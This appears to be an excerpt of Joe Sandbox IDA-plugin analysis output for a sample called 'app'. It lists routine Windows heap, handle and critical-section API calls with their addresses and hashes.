                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3298025750-0
                                                                                                                                              • Opcode ID: 7be8984d0ec79001886491a4c84d5c114a08d89aa9fbc90cfd84f27560782648
                                                                                                                                              • Instruction ID: bb7e988378dd78d18ce625cc6a753dffc295f55e92d069590a5ac78ea582d8ee
                                                                                                                                              • Opcode Fuzzy Hash: 7be8984d0ec79001886491a4c84d5c114a08d89aa9fbc90cfd84f27560782648
                                                                                                                                              • Instruction Fuzzy Hash: 35219331240605DBDB75AF28ED44FAABBAAFF40319F000919E15A471E0DB326857DF4C
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0258224A: HeapFree.KERNEL32(00000000,?), ref: 025822AD
                                                                                                                                                • Part of subcall function 0258224A: HeapFree.KERNEL32(00000000,?), ref: 025822C7
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02582137
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02582154
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02582187
                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0258219E
                                                                                                                                                • Part of subcall function 02582374: HeapFree.KERNEL32(00000000,?,?,?,0258C1F4), ref: 02582393
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap$CloseHandle
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1910495013-0
                                                                                                                                              • Opcode ID: b1324bc8af9e10365e0d5e1cf918145dd11e1c34f44c554d598f85362b70cbec
                                                                                                                                              • Instruction ID: 376c70b6105e3925f126d1a0cef656492d283a4c91e601d8c33d02eb12761b6f
                                                                                                                                              • Opcode Fuzzy Hash: b1324bc8af9e10365e0d5e1cf918145dd11e1c34f44c554d598f85362b70cbec
                                                                                                                                              • Instruction Fuzzy Hash: 5A312D30545B80DEEB79EB34D818BE7BFE17B12309F04081CD5EB961A0CBB42589DB0A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 0042BA4E
                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?), ref: 0042BA5E
                                                                                                                                              • LocalFree.KERNEL32(?), ref: 0042BA67
                                                                                                                                              • TlsSetValue.KERNEL32(?,00000000), ref: 0042BA79
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalSection$EnterFreeLeaveLocalValue
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2949335588-0
                                                                                                                                              • Opcode ID: adc86d93950956f94ff1fa4b69a28a4dbd768d562191854466258b1d3a764b62
                                                                                                                                              • Instruction ID: c8599666faf44035fd4f326778121f3d69334d8a3193f5103dac8be459df7837
                                                                                                                                              • Opcode Fuzzy Hash: adc86d93950956f94ff1fa4b69a28a4dbd768d562191854466258b1d3a764b62
                                                                                                                                              • Instruction Fuzzy Hash: 3D116731700214EFD720CF54E884F6AB3B4FF05315F90802EE142876A1CB79AD51CBA8
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0257C781: HeapFree.KERNEL32(00000000,?), ref: 0257D2DD
                                                                                                                                                • Part of subcall function 0257C781: HeapFree.KERNEL32(00000000,?), ref: 0257D32E
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02582137
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02582154
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02582187
                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0258219E
                                                                                                                                                • Part of subcall function 02582374: HeapFree.KERNEL32(00000000,?,?,?,0258C1F4), ref: 02582393
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap$CloseHandle
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1910495013-0
                                                                                                                                              • Opcode ID: acf7a76a67c92246053c7fa34209de7b344dd169bd0444def9d1b54931f4976f
                                                                                                                                              • Instruction ID: 2ba688e2f69652766064f3878a76fed544d766c2b1a62b7b33142b2cde6ba85e
                                                                                                                                              • Opcode Fuzzy Hash: acf7a76a67c92246053c7fa34209de7b344dd169bd0444def9d1b54931f4976f
                                                                                                                                              • Instruction Fuzzy Hash: 4B311E30145B80DEEB79EB34D818BE7BFE17B52309F04081CD5EB951A0CBB42599DB0A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02582137
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02582154
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02582187
                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0258219E
                                                                                                                                                • Part of subcall function 02582374: HeapFree.KERNEL32(00000000,?,?,?,0258C1F4), ref: 02582393
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap$CloseHandle
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1910495013-0
                                                                                                                                              • Opcode ID: f904fb0a250f07bda3722f0cf0527b4e3d349375ce6e19615375a31447abc095
                                                                                                                                              • Instruction ID: 1dad0b2db8c0d6afd89c16604c39f2da8d9ba361d84d255df1a81c3abd56723a
                                                                                                                                              • Opcode Fuzzy Hash: f904fb0a250f07bda3722f0cf0527b4e3d349375ce6e19615375a31447abc095
                                                                                                                                              • Instruction Fuzzy Hash: D0311C30145B80DEEB7AEB34D818BE7BFE17B52309F04081CD5EB951A1CBB42599DB0A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • HeapReAlloc.KERNEL32(00000000,00000050,76170A60,00419242,76170A60,?,77D5FBD0), ref: 00418C78
                                                                                                                                              • HeapAlloc.KERNEL32(00000008,000041C4,00000000,76170A60,00419242,76170A60,?,77D5FBD0), ref: 00418CB1
                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 00418CCF
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 00418CE6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocHeap$FreeVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3499195154-0
                                                                                                                                              • Opcode ID: 781063ac87fbfd1d4cad2045dae12bfd37df52046da3970f80f829b7a7e5edd2
                                                                                                                                              • Instruction ID: 00585c3f01842366698a5c53355d7c0cceb2ecdc2162a53b836031793970d5b4
                                                                                                                                              • Opcode Fuzzy Hash: 781063ac87fbfd1d4cad2045dae12bfd37df52046da3970f80f829b7a7e5edd2
                                                                                                                                              • Instruction Fuzzy Hash: E9116D742426029FDB718F28FC85D627BB6F7927607A4463EF252C21B0E7709846CF68
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02582137
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02582154
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02582187
                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0258219E
                                                                                                                                                • Part of subcall function 02582374: HeapFree.KERNEL32(00000000,?,?,?,0258C1F4), ref: 02582393
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap$CloseHandle
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1910495013-0
                                                                                                                                              • Opcode ID: 091f08f4e914af45332aeacaec53aa960662c8f353604cdbd1044a5cc967adfd
                                                                                                                                              • Instruction ID: e96f1bdd064c1773c8068a96364f5a95bed59fd1547a5ee151d8eb2685879632
                                                                                                                                              • Opcode Fuzzy Hash: 091f08f4e914af45332aeacaec53aa960662c8f353604cdbd1044a5cc967adfd
                                                                                                                                              • Instruction Fuzzy Hash: BA213B70145B80DFEB76AB30D808BE6BFA1BF11309F04081CD6DA965A0DBB52599DB4A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257D098
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257D0B5
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257D0FF
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257D118
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3298025750-0
                                                                                                                                              • Opcode ID: 72b5fa6c86c356e7154a60258190070a36aef661695719103f4dbfa4692107a8
                                                                                                                                              • Instruction ID: 706b0cfbc7ff28a2cb7d53c613e15a357e0269a007d689ada88168af845d7102
                                                                                                                                              • Opcode Fuzzy Hash: 72b5fa6c86c356e7154a60258190070a36aef661695719103f4dbfa4692107a8
                                                                                                                                              • Instruction Fuzzy Hash: 17115431181A40DBDB759B24FD08BA6BBF2FF04309F140D1DE58A925A0DBB26495DF4D
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • EnterCriticalSection.KERNEL32(0044AF54,?,00000000,?,00000000,0042B7B5,00000010,?,?,00000000,?,?,0042B396,0042B349,00429E06,0040C70D), ref: 0042BD76
                                                                                                                                              • InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,00000000,0042B7B5,00000010,?,?,00000000,?,?,0042B396,0042B349,00429E06,0040C70D), ref: 0042BD88
                                                                                                                                              • LeaveCriticalSection.KERNEL32(0044AF54,?,00000000,?,00000000,0042B7B5,00000010,?,?,00000000,?,?,0042B396,0042B349,00429E06,0040C70D), ref: 0042BD91
                                                                                                                                              • EnterCriticalSection.KERNEL32(00000000,00000000,?,00000000,0042B7B5,00000010,?,?,00000000,?,?,0042B396,0042B349,00429E06,0040C70D), ref: 0042BDA3
                                                                                                                                                • Part of subcall function 0042BCDF: InitializeCriticalSection.KERNEL32(0044AF54,0042BD56,0042B7B5,00000010,?,?,00000000,?,?,0042B396,0042B349,00429E06,0040C70D), ref: 0042BCF7
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalSection$EnterInitialize$Leave
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 713024617-0
                                                                                                                                              • Opcode ID: 2f1b24a4f239d3e7a57dd448b17dc9936c7578022bdd4031e6a5dfacb9bda7aa
                                                                                                                                              • Instruction ID: f612f0568f59398d43542fae4ddb9eea5b0bce547e4844d3ce0b5f2d18dd5514
                                                                                                                                              • Opcode Fuzzy Hash: 2f1b24a4f239d3e7a57dd448b17dc9936c7578022bdd4031e6a5dfacb9bda7aa
                                                                                                                                              • Instruction Fuzzy Hash: 10F06D7A11022AEFE7109F94FC84BA2B3ACFB11316FC0043BE50482011D738A869CAEC
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%